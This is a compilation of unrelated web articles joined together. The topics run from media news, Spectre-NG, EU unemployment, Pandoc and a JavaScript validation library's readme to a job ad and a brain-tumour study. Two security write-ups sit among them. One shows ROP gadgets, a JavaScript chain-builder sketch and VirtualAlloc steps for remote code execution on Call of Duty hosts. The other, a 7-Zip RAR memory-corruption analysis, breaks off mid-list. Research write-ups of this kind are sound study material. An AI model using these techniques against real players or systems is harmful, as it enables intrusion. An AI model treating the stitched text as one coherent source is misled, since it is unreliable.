  • Gaming the system: Wired described in a recent piece how some critics believe both Google and Facebook are trying to implement the GDPR rules in a way that allows them to “game the system,” leaving users no better off than they were before. The supervisor of the EU’s data protection authority called the online platforms “digital sweat factories” whose approach to privacy is unsustainable, and said their proposals violate the spirit of the new regulations.
  • Power move: Some believe the new GDPR rules and other privacy-related regulations that emerged following the Cambridge Analytica leak could actually reinforce the power Facebook and Google have, since it will make it more difficult for other companies to acquire data or use it to build new services. That would effectively build a wall around the data Google and Facebook already possess, argues tech analyst Ben Thompson in an essay for his subscription newsletter Stratechery.
  • A data shell game: Facebook also appears to be restructuring itself behind the scenes in order to reduce its legal liability under the GDPR: It is moving the responsibility for data involving all non-EU users—who represent about 70 percent of the total, or about 1.5 billion—to its US subsidiary from its Irish subsidiary, meaning they will be governed by US laws on data protection, not the GDPR.

Other notable stories:

  • A group called the Student Press Coalition did a survey of student journalists at 49 Christian colleges and universities and found that more than 75 percent had faced pressure from university personnel to change, edit, or remove an article after it had been published in print or online. About 70 percent said their faculty advisors have the ability to stop a story from being printed.
  • According to a memo obtained by Variety, staffers at NBC were told by management that if they reported the sexual harassment accusations against veteran broadcaster Tom Brokaw, they had to also mention a letter of support for the former anchor. The letter was signed by more than 60 employees of the network, including prominent on-air personalities, and some staffers said they felt pressure to sign.
  • The fallout from the White House Correspondents Association dinner continues: The Hill, a site focused on stories about Washington politics, said it is pulling out of the event because it “casts our profession in a poor light,” and The New York Times says CBS News also considered pulling out, but changed its mind after being assured that event organizers plan to switch up the format.
  • Speaking of the WHCA dinner, CJR’s Karen Ho dug into the finances of the event, and found that last year, the organization raised a total of almost $900,000 from ticket sales and donations for the event. About $550,000 of that went to pay for the venue and the entertainer, and only about $100,000 went toward the scholarships that the WHCA says are the main reason it does the dinner in the first place.
  • According to Ken Doctor at the Nieman Lab, hedge fund Alden Global Capital—which owns the Digital First Media newspaper chain—may be getting attacked for all the cuts it’s making at the papers it operates, but it isn’t likely to stop anytime soon because it has one of the highest profit margins.

ICYMI: One Alabama newspaper’s business model features a chair and a cigar box

Mathew Ingram is CJR's chief digital writer. Previously, he was a senior writer with Fortune magazine. He has written about the intersection between media and technology since the earliest days of the commercial internet. His writing has been published in The Washington Post and the Financial Times as well as Reuters and Bloomberg.

Eight New Spectre Variant Vulnerabilities for Intel Discovered


News has just started spreading that researchers have sighted another eight Spectre-like vulnerabilities in Intel processors; all of them resemble Spectre, and four are critical. The new vulnerabilities are grouped together and named Spectre-NG. The newly discovered vulnerabilities would make it really easy to exploit a host from a simple VM.

German c't / Heise reports and breaks the news today, as the new vulnerabilities have not been made public just yet. There is said to be 'no doubt' that these are real vulnerabilities. While technical details are missing, the attack scenarios closely resemble those of the Spectre vulnerabilities.

Currently, shared hosting providers are most at risk: once you have access to your rented server container, you could exploit the processor to retrieve secure data. All eight vulnerabilities share the same design problem detailed by the "Meltdown and Spectre" vulnerabilities; they are, so to speak, Spectre Next Generation, ergo Spectre-NG. c't mentions it has concrete information about Intel's processors and their patch plans. However, there are some indications that other processors are affected as well; at least some ARM CPUs are also vulnerable to some extent. Whether and to what extent the AMD processor architecture is vulnerable (if at all) is not yet known.

Intel is reportedly actively and nervously working on Spectre-NG patches behind the scenes; other patches are being developed in collaboration with the operating system manufacturers (Microsoft, Linux, etc.). When exactly the first Spectre-NG patches and firmware updates will become available is not yet clear. According to available information, Intel is planning at least two patch waves: a first one should start in May, and a second is currently scheduled for August. For at least one of the Spectre-NG patches there is already a specific date: it was Google's Project Zero that found one of the vulnerabilities, and its 90-day disclosure period expires on May 7, the day before the Windows Patchday. So that is likely when the first patch for Microsoft Windows would be released. Microsoft is preparing CPU patches: they appear to come in the form of optional Windows updates rather than microcode (firmware) updates, as the PC motherboard and server manufacturers would probably take too long with BIOS updates.

Intel classifies four of the Spectre-NG vulnerabilities as "high-risk", which in Intel language translates to: super dangerous. The danger of the other four is rated as medium. According to c't/Heise, Spectre-NG risks and attack scenarios are similar to those of Spectre, with one exception. c't calls the Intel vulnerabilities and the affected processors a Swiss cheese due to the many security holes.



The Unemployment Rate in Every Region of Europe


Submitted by Taps Coogan on the 3rd of May 2018 to The Sounding Line.

The following map, from Eurostat, shows the unemployment rate in every region of Europe and Turkey as of 2017.

As the map clearly illustrates, there is a sharp divide between the low unemployment rates (blue) that persist in nearly every region of ‘Northern Europe’ and the higher unemployment rates that persist virtually everywhere else (tan, orange, and red). Germany, Switzerland, Austria, the Netherlands, the UK, Norway, and Denmark have only a few regions where the unemployment rate exceeds 5.7% and just one where the unemployment rate exceeds 9.5%. Conversely, there are only two regions/counties within all of France, Spain, Portugal, Italy, Greece, Ireland, Finland, Estonia, Latvia, Lithuania, Croatia, and Slovenia where the unemployment rate is below 5.8%, a level generally considered to indicate a healthy labor market.

The economic division and nonperformance of the European Union is a theme that we have discussed frequently here at The Sounding Line. The EU is experiencing: falling wages, growing economic inequality, declining workforce participation, some of the worst bad debt ratios in the world, the highest effective tax burden in the developed world, nearly the slowest inflation adjusted economic growth in the world this century, the highest concentration of public workers among developed economies, surging capital flow imbalances, and declining productivity. All of this has happened despite the European Central Bank maintaining interest rates at record negative lows and printing more money than any other central bank in the history of the world. Despite all of this, despite UK voters deciding to leave the EU nearly two years ago, and despite Italian voters’ recent abandonment of pro-EU parties, the leadership of the EU has put forward virtually no concrete structural, regulatory, or tax reforms to make the EU’s economy more competitive. To the contrary, the EU appears to be doubling down on higher taxes and more federalization.

Just imagine what will happen whenever the next recession eventually arrives.


A Call of Duty exploit


⚠️ This article expects you to have at least basic knowledge about the x86 architecture and assembly language. ⚠️

A few years ago, I became aware of a security issue in most Call of Duty games.
Although I did not discover it myself, I thought it might be interesting to see what it could be used for.

Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer overflow on the host’s system inside a stack-allocated buffer within the game’s network handling.
In consequence, this allows full remote code execution!

To use this vulnerability to exploit the game, a few things have to be taken into consideration.
To exploit this vulnerability (or actually any vulnerability), you need to replicate the network protocol of the game.
This turns out to be somewhat complex, so I decided not to rewrite this myself but to actually use the game as a base and to simply force it into sending malicious hand-crafted packets that exploit it.

And indeed, this method seems to work, but the problem is that you need to modify the game in order to send the packets.
As Call of Duty has, just like any modern game these days, a not-so-bad anti-cheat mechanism (namely VAC), modifying it could result in me getting banned from the game.

After a few other failed attempts of exploiting this vulnerability, I came up with something completely different: Why shouldn’t I use the game, without actually using the game?

The idea is still to take the game as base, but instead of hooking it, the underlying network transactions are analyzed to recreate the state of the game and to inject custom packets into the system’s network stack that look as if they were sent by the game.
So you don’t modify the game itself, but rather control all the data it sends and receives.
As this method doesn’t touch the game at all, it is not possible for current anti-cheat systems to detect this (it actually is possible, but I don’t think there is any anti-cheat that tries to detect that, yet).

I’m probably not the first one to come up with this idea, but I have never heard of something like this before (to be fair, I’m not very familiar with game hacking and cheating in general).

To realize this idea, I decided to go with the game Modern Warfare 2. Even though this game is pretty old, some people still play it. As this security issue exists in most Call of Duty games (even up to the latest title, World War II), I could have used any game as a base, but every title released after MW2 has some kind of TLS layer underlying the network traffic which makes the analysis process much harder. Although it's not impossible, I didn't want to spend my time on reverse engineering it, as this should only be a proof of concept.

To capture the network traffic of the game, I decided to go with WinDivert. I could have used libpcap instead, but I wanted to use WinDivert, as it provides a small abstraction over the network stack: you don't have to deal with the underlying Ethernet protocol or with choosing the right network interface with the correct MAC address.

With this step done, it was time to analyze the network traffic.
The sad news is that, even though I don't have to understand the whole network protocol of the game, I still have to replicate it partially to be able to build custom packets.
This took some time, but I finally managed to get it done, at least to the extent that the game accepted my custom packets and decrypted them correctly.
Looking at the Quake 3 network protocol helped a lot, as Call of Duty and Quake share a similar protocol due to using nearly the same engine.

Here is where the interesting part starts:
Now that it is possible to inject packets into the game, we can start exploiting the vulnerability!
With the help of Return-oriented programming it is actually possible to write code, by just having access to the stack.
At first, it was necessary to rewind the stack to be able to use the entire buffer to execute code, and not just the overflowing part.
So to do that I had to execute shellcode that looks similar to this:

sub esp, ###
retn

This piece of assembly language tells the system to rewind the stack by ### bytes, where ### represents the length of the buffer we have access to plus the number of bytes we are overflowing.
To achieve that, it is required to write that code into the host’s system at a place that allows code execution.
Sadly, there is no space in memory with execution rights which is writable. At least there is no space I know of.
The way to go was to make the system call VirtualAlloc to allocate memory with enough rights to write and execute memory (essentially: PAGE_EXECUTE_READWRITE).
As the game itself uses VirtualAlloc to allocate memory, I looked up the address in the game’s Import Address Table.
Now to call that function, it is required to dereference the entry in the IAT and to pass all parameters accordingly, but most importantly, the return value has to be stored somewhere, as this is essentially the pointer to the memory we want to write our code to.
Using a set of ROP-Gadgets I discovered, I managed to get the game to dereference the address to the IAT in multiple steps and to call the function (which is VirtualAlloc).
Passing the parameters is easy, as we can simply push them onto the stack in reversed order (at least with x86, x64 would be a bit harder due to having a different calling convention).
Saving the return value requires to store it at a known address, so I took a pointer to some piece of data, that I was sure the game would not require anymore (I used the location at which the game stores a handle to the splash screen window, which only appears when the game starts).

Now that we have executable and writable memory, we simply have to write our shellcode to it.
Note that we still have the target memory address in the eax register.
Having that in mind, I found a few other interesting gadgets which could help:

pop ecx
retn

mov [eax], ecx
retn

add eax, 3
retn

add eax, 1
retn

The first gadget allows us to pop 4 bytes from the stack into the ecx register.
The second one allows us to copy the data from ecx into the memory to which eax points (eax still stores the address of the memory we allocated).
As this only allows us to write 4 bytes into memory, we have to increment eax by 4 to be able to write another 4 bytes.
Unfortunately, I did not find a gadget that increments eax by 4, but luckily it can be increased by 3 in one step and then by 1 in another (3 + 1 = 4 💪).
Using that, we can divide the stack-rewinding shellcode into 4-byte blocks and write it into memory block by block.
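In the injection tool, such a chain is in the end just a sequence of little-endian 32-bit words dropped into the malicious packet. Here is a hypothetical sketch in JavaScript of how those words might be laid out; all gadget addresses are invented and are not the real Modern Warfare 2 locations:

// Hypothetical helper for laying out ROP words in the overflowing packet.
const POP_ECX_RET      = 0x00401111;  // pop ecx; retn      (address invented)
const MOV_PEAX_ECX_RET = 0x00402222;  // mov [eax], ecx; retn
const ADD_EAX_3_RET    = 0x00403333;  // add eax, 3; retn
const ADD_EAX_1_RET    = 0x00404444;  // add eax, 1; retn

function dwords(values) {
  const buf = Buffer.alloc(values.length * 4);
  values.forEach((v, i) => buf.writeUInt32LE(v >>> 0, i * 4));
  return buf;
}

// Write one 4-byte block of shellcode to [eax], then advance eax by 3 + 1 = 4.
function writeBlock(block) {
  return dwords([
    POP_ECX_RET, block,   // ecx = next 4 shellcode bytes
    MOV_PEAX_ECX_RET,     // [eax] = ecx
    ADD_EAX_3_RET,
    ADD_EAX_1_RET,
  ]);
}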

Once this is done, it still has to be executed. To do that, we need to get our initial pointer back (which we luckily stored at the place where the game stored its splash screen handle).
Using

pop edx
retn

we can tell the game to put the address of the splash screen slot into edx, that is, a pointer to our memory pointer.

Using

mov eax, [edx]
retn

we can dereference it into eax which allows us to execute it using the last gadget:

jmp eax

Now we have access to the whole buffer for executing code!
Additionally, as I care about the host, I of course have to free the reserved memory again by calling VirtualFree the same way I called VirtualAlloc before.

To make my life easier, I turned this whole step of allocating memory, writing to it, executing it and freeing it, into a macro that allows to easily execute any kind of assembly code that I want.

Unfortunately, by overflowing the buffer and writing to the stack, we actually destroy the whole stack of the game, which forces it either to crash (if it executes arbitrary operations on the stack past our code), or to terminate gracefully if we tell it to do so.

Luckily, I discovered a way out!
When starting a thread, every Call of Duty game stores the context of the current thread in the thread’s local storage area using setjmp.
We can use that to restore the context to what it was before by loading it from the TLS and passing it to longjmp.

Now that we have full control, we can execute any code we want and restore the context to continue the execution of the game.

Using that we can, for example, draw HUD elements, which are basically elements on the screen that every user you play with sees (e.g. text).
We could also change the map or change the game configuration to make players run faster, or whatnot.
A thing to note is that as we’re executing code in the process of the current match’s host, it is still possible that the host’s anti-cheat system detects this as a cheat. As we’re not doing anything in our process, but in someone else’s, we are perfectly safe.
However, I did not modify any memory of the game that is protected or do anything that could let the anti-cheat system think that the host is cheating, so he should be safe as well.

With that said, we can do any kind of crazy stuff. Here you can see a demo of me changing the map, displaying the HUD element "You have been hacked" on everyone's screen and increasing the speed:

To sum it up, this tool allows to control the game by analyzing the network traffic and executing code on the host’s system using injected packets.
It could also be used to harm the host by accessing his filesystem, downloading an executable file and running it, or doing similar things on his computer. To prevent others from using this tool for that, I could not publish the code at first. Now that the vulnerability has been patched, the code is available on GitHub.
Other than that, I’m happy that it works, as I haven’t seen any kind of ‘hack’ like this before (although I’m pretty sure they exist).

How I wrote my book using Markdown, Pandoc, and a little help from the internet


Did I mention recently that I just wrote a book? I hope you’re not tiring of the self-promotion here and on my social media feeds, but I’m very happy with how the book turned out, and I want as many people as possible to get their hands on it. I had a great experience researching and writing this book. But when I started, I had no experience at all with the process of actually writing a book. I had to do a lot of research not only on things like cognitive psychology and pedagogical practices; I also had to figure out the technical process of putting a book together.

With a project this complex, it turns out that you can’t just open up a word processor and start typing. There are issues to consider that don’t have a single right answer, and I had to figure out a way to deal with them that worked for me and my workflow. I got a lot of help from blog posts and articles about this as I was writing, so I wanted to share what I learned about all this in hopes that it helps others.

Fair warning: A lot of what I am about to describe can charitably be called “hacks”. There are probably simpler and better ways to do just about everything you will see. If you have an idea for improvement, leave it in the comments.

Markdown as the center of my writing universe

First of all, you have to understand how committed I am to using Markdown.

Markdown is a text processing platform that emphasizes making text readable while maintaining simplicity of form. If you’re new to Markdown, start here and then read anything you can about it, and try it out online or in a text editor. It would be a huge understatement to say that I am a fan of Markdown. Markdown for me is closer to being a lifestyle choice than a text processing system. I love Markdown: I love its simplicity, its portability, its lightweightness, its future-proof-ness. I write everything in Markdown unless there is a good reason not to: reports, syllabi, emails, even my blog posts and grocery lists.

By writing in Markdown, and keeping the content of my writing in what’s essentially plain text, I can open and edit it basically anywhere and on any device without worrying about compatibility. On my Mac, I write mostly in Atom, or sometimes in Sublime Text or Typora if I am wanting a change of pace. If I’m not around my Mac I can use Editorial on my iPad. If all I have is a web browser I can use StackEdit. The language itself is agnostic to hardware and operating system; it’s just plain text with a little spice added. Because it’s based on plain text, it’s uncomplicated, files stay small, and I know those files will be readable and editable 100 years from now.

At the very first stage of writing my book, I knew that I really, really wanted to write it in Markdown.

But…

My publisher, Stylus Publications, has been an absolute joy to work with. They have been supportive from the very beginning and are currently doing a great job marketing it. Everyone involved with Stylus, from my editor down to the person who arranges flyers for conferences, has been great.

But, Stylus doesn’t do Markdown. Stylus only works with Word documents.

It makes sense. I’m not a huge fan of Word, but one thing it does very well is track changes. Once I submitted the manuscript last August, it began a back-and-forth process where my main editor suggested large-scale changes; I made those and sent them back in; then there was a sequence of exchanges for copy editing where a large number of smaller detailed changes were proposed. By “large number”, I mean hundreds, ranging from typos to correct all the way up to complete restructurings of paragraphs and sections. And not all of those proposed changes were ones that I wanted to make, at least in the way the editor suggested. So we had to have a way of proposing changes, accepting or rejecting or modifying them, and keeping track of them. Word is probably the best choice for that.

However, I didn’t relish the thought of writing a 300-page book in Word, to say the least. So I needed to devise a way to deliver a final product in Word, without actually writing it in Word.

Enter Pandoc

Fortunately I didn’t have to look very far. There’s already a great tool for doing what I wanted, and I had actually been using it for some time now: Pandoc.

Pandoc is a command-line program that basically changes any kind of (text-based) file into any other kind of (text-based) file. For example, you can use it to convert Word documents to HTML, LaTeX files to Word (with equations formatted!), plain text to ePub, and so on and so on. In particular, you can easily convert Markdown to Word. To convert foo.md to foo.docx, just navigate to the directory where foo.md is located and type

pandoc -s foo.md -o foo.docx

The -s is short for --standalone (produce a complete document rather than just a fragment) and the -o stands for “output”. And that’s that — the Word-ified version of the Markdown file will just be sitting there in the same directory as the source.

So my plan became:

  1. Write each individual chapter as its own separate Markdown file. I wrote the book with the philosophy of keeping individual chapters short; this way it would be simple to compartmentalize all the individual pieces of the book.
  2. Combine all the Markdown files into one mega-file when done.
  3. Convert the mega Markdown file to Word with Pandoc.

There was one big obstacle to overcome if I was going to do it this way: Handling my references.

Managing references with BiBTeX

If you’ve ever written a journal article, you know that managing those references can be tricky. Each actual reference in the text has to be tagged with some kind of abbreviated information about it. Sometimes this is a number (for example, “[3]”) that points to a spot in a bibliography at the end where the full reference is given; sometimes it’s a list of the authors with publication date (for example, “(Lennon and McCartney, 1964)”). And there are different styles for citations like this.

Citing references in published work is at once extremely important — a core concept of scholarship being transparency in one’s sources — and unbelievably fragile. What if you write a 50-page paper that references an article 20 times, all with the label “[3]”, and then in the revision process you add or subtract a reference so that “[3]” is no longer the third reference in the bibliography? You don’t want to manually hunt down and change all the [3]’s; it’s mildly annoying in a 20-page paper and potentially insanity-producing in a 300-page book, and the possibility of missing one of those references is high. I didn’t actually count how many references my book has, but the references section is a solid eight pages long, including references to books, journal articles, websites, unpublished manuscripts, privately-conducted interviews, and more. So this was a big issue.

What you need is a way to automate references. For example, if that paper by Lennon and McCartney could be coded in as LennonMcCartney1964, and there were a system that allowed you to type in LennonMcCartney1964 whenever you referenced it and then automatically generate the bibliography at the end with the correct numbering, then keeping track of the [3]’s is no longer an issue. Fortunately, this system exists and has been used for decades, and it’s called BiBTeX.

BiBTeX is normally associated with documents written up using LaTeX, a markup language used for writing mathematical and technical documents. We mathematicians use LaTeX like we use oxygen; it’s the one technology that all mathematicians use. If I were writing a LaTeX document and I wanted to cite the Lennon and McCartney 1964 paper, I would just need to:

  1. Create a plain text file and enter in the citation info for the paper using BiBTeX’s format syntax. One piece of that syntax is a handle used for referring to the paper, for example LennonMcCartney1964.
  2. Go to the place where I want to cite the paper and type: \cite{LennonMcCartney1964}.
  3. Make sure the LaTeX source document has a few lines of code in it that tell it to process the BiBTeX file. And then,
  4. Just compile the LaTeX document. LaTeX takes care of auto-numbering the references and if these change in your text, the references will change when compiled again.

So BiBTeX is the right solution if you’re using a LaTeX document. Which I wasn’t. I’m a Markdown guy, remember?

Making BiBTeX work with Markdown and Pandoc

Fortunately, I stumbled across this blog post by seminary student Chris Krycho that gave me my final solution. It turns out that Pandoc can handle BiBTeX like a boss, even when the references are in Markdown files and not LaTeX files.

The way it works is like this.

First, create a BiBTeX file for the references just as if you were using LaTeX. For the book, I used BibDesk, a free tool for managing BiBTeX files. But you could just use a text file for this. Here’s what BibDesk looks like with one of the references highlighted.

Then, in the Markdown file, whenever a reference is made, you just put the citation key for the reference prepended with an @ symbol. For example, the reference for the Linda Nilson book shown above has the citation key nilson2013creating. So when I want to cite it, I just type in @nilson2013creating like so:

This citation syntax is the Markdown analog of the LaTeX command \cite{nilson2013creating}. When the Markdown file is processed, that citation will turn into a formatted citation using a style that I can specify. How is this “processing” done, you ask? Using Pandoc. The command to get Pandoc to do all this is:

pandoc foo.md --smart --standalone --bibliography /.../talbertlibrary.bib -o foo.docx

where foo.md is the source Markdown file and /.../talbertlibrary.bib is the complete path to the location of the BiBTeX file that stores your references. (Mine was called talbertlibrary.bib.) The options being passed to Pandoc are:

  • --smart: This makes the typography look nice (converting dashes to em-dashes, etc.) and has nothing to do with the bibliography. But for the publisher, it matters.
  • --standalone: The documentation says “Produce output with an appropriate header and footer”. Honestly I’m not sure what happens if you leave it out. I found it on the internet and didn’t want to mess with it.
  • --bibliography: This is the parameter that tells Pandoc that you are pulling references from a bibliography. This is followed by the path to the BiBTeX file. The @ syntax is rendered automatically.

Again, once Pandoc is run, it produces a Word file. Here’s a screenshot from the results:

Very importantly: Pandoc also puts all the references at the end of the output file in an alphabetically ordered list. So you end up with a bibliography.

Finishing touches

Once I ran Pandoc on the mega Markdown file, I had a nicely formatted Word document with automatic references and a bibliography. All I needed to do to finish it was:

  • Add a cover page, which the publisher wanted. Trivial to do in Word.
  • Add a table of contents. This can be done in Markdown with Pandoc but it’s easier to do in Word, especially since the header syntax in Markdown that uses the # symbol creates actual headers in Word, and Word’s table-of-contents generator uses headers to do its thing, which requires just a single menu selection.
  • On a couple of occasions, some of the images I had included with Markdown syntax didn’t look right after running Pandoc. For example, there were a couple of images that needed to go side by side, and there’s no way I know of to do this in Markdown. It was simpler to just add those in Word afterward.

And with that, I had a manuscript that was ready to go to the publisher, without doing any actual writing in Word.

Moving forward from there, everything was done in Word, again because that’s the standard file format that my publisher uses and it was important to track changes. But I’m OK with that, since none of the changes I made involved large amounts of actual writing.

Conclusion

Just as a postscript, my book doesn’t have a lot of math notation in it, but if it did, I could still use this workflow since Pandoc can render LaTeX expressions found in Markdown files, using MathJax. All you have to do is add --mathjax to the Pandoc command:

pandoc foo.md --mathjax --smart --standalone --bibliography /.../talbertlibrary.bib -o foo.docx

This produces a Word file with LaTeX-rendered equations in it. Or if you need the output to be a PDF, just change the .docx to .pdf; similarly if you want a plain LaTeX file, change it to .tex.
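For example, the same command with only the output file name changed would be:

pandoc foo.md --mathjax --smart --standalone --bibliography /.../talbertlibrary.bib -o foo.pdf
pandoc foo.md --mathjax --smart --standalone --bibliography /.../talbertlibrary.bib -o foo.tex

(Note that producing a PDF this way requires a LaTeX installation on your machine, since Pandoc typically builds PDFs through a LaTeX engine.)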

You should always use the best tools for the job. For writing my book, those tools were Markdown and a text editor for the writing itself, BibDesk for managing my references, and then Word for making it all look nice. I was really pleased to find ways to make all of these interact, and I would strongly lean toward using this tool stack for any writing project in the future.

Have we forgotten how to code?


readme.md


Function argument validation for humans

Highlights

  • Expressive chainable API
  • Lots of built-in validations
  • Supports custom validations
  • Written in TypeScript

Install

$ npm install ow

Usage

import ow from 'ow';

const unicorn = input => {
  ow(input, ow.string.minLength(5));
  // ...
};

unicorn(3);
//=> ArgumentError: Expected argument to be of type `string` but received type `number`

unicorn('yo');
//=> ArgumentError: Expected string to have a minimum length of `5`, got `yo`

API

Complete API documentation

ow(value, predicate)

Test if value matches the provided predicate.

ow.create(predicate)

Create a reusable validator.

const checkPassword = ow.create(ow.string.minLength(6));

checkPassword('foo');
//=> ArgumentError: Expected string to have a minimum length of `6`, got `foo`

ow.any(...predicate[])

Returns a predicate that verifies if the value matches at least one of the given predicates.

ow('foo', ow.any(ow.string.maxLength(3), ow.number));

ow.{type}

All of the types below return a predicate. Every predicate has some extra operators that you can use to test the value in a more fine-grained way.

Primitives

Built-in types

Typed arrays

Structured data

Miscellaneous

Predicates

The following predicates are available on every type.

not

Inverts the following predicates.

ow(1, ow.number.not.infinite);

ow('', ow.string.not.empty);
//=> ArgumentError: [NOT] Expected string to be empty, got ``

is(fn)

Use a custom validation function. Return true if the value matches the validation, return false if it doesn't.

ow(1, ow.number.is(x => x < 10));

ow(1, ow.number.is(x => x > 10));
//=> ArgumentError: Expected `1` to pass custom validation function

Instead of returning false, you can also return a custom error message which results in a failure.

const greaterThan = (max: number, x: number) => {
  return x > max || `Expected \`${x}\` to be greater than \`${max}\``;
};

ow(5, ow.number.is(x => greaterThan(10, x)));
//=> ArgumentError: Expected `5` to be greater than `10`

Maintainers

Related

License

MIT

Thought Process of Great Programmers or Developers


Today programming is a leading career with a bucket full of dollars, but this leading professional field also has a dark side, like every other career option. Everything has its own merits and demerits. Humans are the creators of code, programming languages, AI, and more, so the question arises: what exactly goes on in the mind of a coder? Those who love to gaze at computer screens, and who can think and create in equal measure, are the top achievers of the IT era. The rapid changes in the technological field need the best brains, able to pick up languages quickly and reason with logic. Humans alone open the doors of imagination. The programmer’s field looks productive but is actually tough: coding everything perfectly rests solely on the programmer’s work and creative skill.


Every kind of profession generates its own kind of error, so in that respect all fields of work are alike. If we look at master minds like Bill Gates, Mark Zuckerberg, James Gosling, Steve Jobs, and others, we will find not all but a few similarities in their personalities. Beyond being popular and rich, they share similarities in how they work. How did they become that great, how do they work, and how do they think are the curious questions worth asking. Stop wondering about the riches and popularity; that is just the name game.

The Orientations Of Great Programmers

If you have an appetite for becoming a successful coder, then listed below are the key ingredients of the recipe for becoming a great programmer. We are sure these personality traits will flourish and nurture a great mind and soul in the programming world.

1. Stop Being Exhausted:

It is obvious that things which take time to tackle are often boring, and coding is one of them. To be a programmer, be patient and keep yourself calm and stress-free. If you get bored of working through errors and mistakes, what will you have to present at your office desk? To program you need to spend hours gazing at computer screens. So, to make a name for yourself, sit up straight and stick to the code until you get an excellent program.

2. Cushion Perfectly:

Sitting for hours in a single position, stuck to a desk and staring at a screen, will wear down not only the mind but the body too. This kind of work is stressful, hectic, and unhealthy. Working for an IT firm looks trendy from the outside, but it takes a toll, so get your regime right. Cushion up your back, take care of your health, and code well.

3. Be Your Friend:

Being honest about your skills and energy is the best way to stay self-motivated. A programmer’s life is not that simple: often the client’s opinion doesn’t match your skills, or maybe you understand the demands and requirements the wrong way. Never feel disappointed by such setbacks. These downfalls are the sugar crystals in the recipe for a perfect programmer.

4. Sharing is Good Deed:

Humans are not superheroes; we need help and we take help. In every sphere of life we get stuck on issues, some personal, some professional, and we need to collaborate on ideas. If your coding is stalled by an error, look for the possible reasons, and don’t hesitate to seek help. Taking help will not shatter your confidence; it will make you learn more and achieve more. Sharing is caring, as they say, because it opens up new doors for creativity. Being ready both to help and to take help is a meaningful mantra.

5. Bliss Your Work:

Stressing too much over your workload will bury you in a pile of tension, which slows down your current pace. Your level of tension directly affects your performance. Keep yourself calm under load if you want excellent results. Enjoy your work, and flush away the hectic strain with a bright shine and a broad smile.

With our professional teams in Delhi, Gurgaon, Noida, and Bangalore, you will not only learn to code but also polish your other personality traits. We provide Android app development training and many more courses to make great programmers. Polishing and nurturing students with solid knowledge will boost the confidence they need to face the practical job world. Learning languages and coding against new interfaces will raise your creative ability and confidence. To be a great programmer, think quickly and wittily toward results. Our training institution, with its various courses, will encourage your inner creativity and skills.

Mobile phone cancer warning as malignant brain tumours double


Fresh fears have been raised over the role of mobile phones in brain cancer after new evidence revealed rates of a malignant type of tumour have doubled in the last two decades.

Charities and scientists have called on the Government to heed longstanding warnings about the dangers of radiation after a fresh analysis revealed a more “alarming” trend in cancers than previously thought.

However, the new study, published in the Journal of Public Health and Environment, has stoked controversy among scientists, with some experts saying the disease could be caused by other factors.

The research team set out to investigate the rise of an aggressive and often fatal type of brain tumour known as Glioblastoma Multiforme (GBM).

They analysed 79,241 malignant brain tumours over 21 years, finding that cases of GBM in England have increased from around 1,250 a year in 1995 to just under 3,000.

The study is the first recent effort of its kind to analyse in detail the incidence of different types of malignant tumours.

The scientists at the Physicians’ Health Initiative for Radiation and Environment (PHIRE) say the increase of GBM has till now been masked by the overall fall in incidence of other types of brain tumour.


ZeroCater nabs $12M in funding- Seeking Director of Engineering to grow team


The work we do is bringing tens of thousands of people together every day. Shared meals are a fundamental human experience. To us, food fosters relationships and new ideas. We’re obsessed with improving our customers’ lives by making every meal count.

Creating Delight

Help build a company that’s dedicated to providing a great service that customers love.

Caring Deeply

Collaborate with people who care deeply about the work they do and have a fundamental drive for growth and improvement.

Moving Fast

We favor constant iteration and improvements that make an immediate and measurable difference to our customers.

Solving Difficult Problems

Accomplish great things at a place where you’re encouraged to clear hurdles that others shy away from.

7-Zip: From Uninitialized Memory to Remote Code Execution


After my previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I continued to spend time on analyzing antivirus software. As it happens, I found a new bug that (as the last two bugs) turned out to affect 7-Zip as well. Since the antivirus vendor has not yet published a patch, I will add the name of the affected product in an update to this post as soon as this happens.

Introduction

7-Zip’s RAR code is mostly based on a recent UnRAR version, but especially the higher-level parts of the code have been heavily modified. As we have seen in some of my earlier blog posts, the UnRAR code is very fragile. Therefore, it is hardly surprising that any changes to this code are likely to introduce new bugs.

Very abstractly, the bug can be described as follows: The initialization of some member data structures of the RAR decoder classes relies on the RAR handler to configure the decoder correctly before decoding something. Unfortunately, the RAR handler fails to sanitize its input data and passes the incorrect configuration into the decoder, causing usage of uninitialized memory.

Now you may think that this sounds harmless and boring. Admittedly, this is what I thought when I first discovered the bug. Surprisingly, it is anything but harmless.

In the following, I will outline the bug in more detail. Then, we will take a brief look at 7-Zip’s patch. Finally, we will see how the bug can be exploited for remote code execution.

This new bug arises in the context of handling solid compression. The idea of solid compression is simple: Given a set of files (e.g., from a folder), we can interpret them as being concatenated into one single data block, and then compress this whole block (as opposed to compressing every file by itself). This can yield a higher compression ratio, in particular if there are many files that are somewhat similar.

In the RAR format (before version 5), solid compression can be used in a very flexible way: Each item (representing a file) of the archive can be marked as solid, independently from all other items. The idea is that if an item is decoded that has this solid bit set, the decoder would not reinitialize its state, essentially continuing from the state of the previous item.

Obviously, one needs to make sure that the decoder object initializes its state at the beginning (for the first item it is decoding). Let us have a look at how this is implemented in 7-Zip. The RAR handler has a method NArchive::NRar::CHandler::Extract that contains a loop which iterates with a variable index over all items. In this loop, we can find the following code:

Byte isSolid = (Byte)((IsSolid(index) || item.IsSplitBefore()) ? 1 : 0);

if (solidStart) {
  isSolid = 0;
  solidStart = false;
}

RINOK(compressSetDecoderProperties->SetDecoderProperties2(&isSolid, 1));

The basic idea is to have a boolean flag solidStart, which is initialized to true (before the loop), making sure that the decoder is configured with isSolid==false for the first item that is decoded. Furthermore, the decoder will (re)initialize its state (before starting to decode) whenever it is called with isSolid==false.

That seems to be correct, right? Well, the problem is that RAR supports three different encoding methods (excluding version 5), and each item can be encoded with a different method. In particular, for each of these three encoding methods there is a different decoder object. Interestingly, the constructors of these decoder objects leave a large part of their state uninitialized. This is because the state needs to be reinitialized for non-solid items anyway and the implicit assumption is that the caller of the decoder would make sure that the first call on the decoder is with isSolid==false. We can easily violate this assumption with a RAR archive that is constructed as follows:

  • The first item uses encoding method v1.
  • The second item uses encoding method v2 (or v3), and has the solid bit set.

The first item will cause the solidStart flag to be set to false. Then, for the second item, a new Rar2 decoder object is created and (since the solid flag is set) the decoding is run with a large part of the decoder’s state being uninitialized.

At first sight, this may not look too bad. However, various parts of the uninitialized state can be used to cause memory corruptions:

  1. Member variables holding the size of heap-based buffers. These variables may now hold a size that is larger than the actual buffer, allowing a heap-based buffer overflow.
  2. Arrays with indices that are used to index into other arrays, for both reading and writing values.
